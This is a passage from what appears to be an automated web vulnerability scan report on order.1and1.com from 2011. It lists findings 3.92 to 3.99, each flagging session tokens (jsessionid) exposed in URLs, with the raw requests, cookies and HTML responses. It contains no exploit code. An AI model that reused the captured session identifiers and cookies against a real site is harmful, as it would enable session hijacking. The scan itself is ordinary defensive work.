</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.92. http://order.1and1.com/xml/order/ServerPremium

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.93. http://order.1and1.com/xml/order/Service

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Service?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.94. http://order.1and1.com/xml/order/Sharepoint

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Sharepoint?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint
Content-Length: 0
Connection: close
Content-Type: text/plain


3.95. http://order.1and1.com/xml/order/TcSpecialOffers

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TcSpecialOffers?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.96. http://order.1and1.com/xml/order/TellAFriend

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TellAFriend?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt
Content-Length: 0
Connection: close
Content-Type: text/plain


3.97. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServer&amp;page=switch&amp;linkOrigin=VirtualServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.98. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.99. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
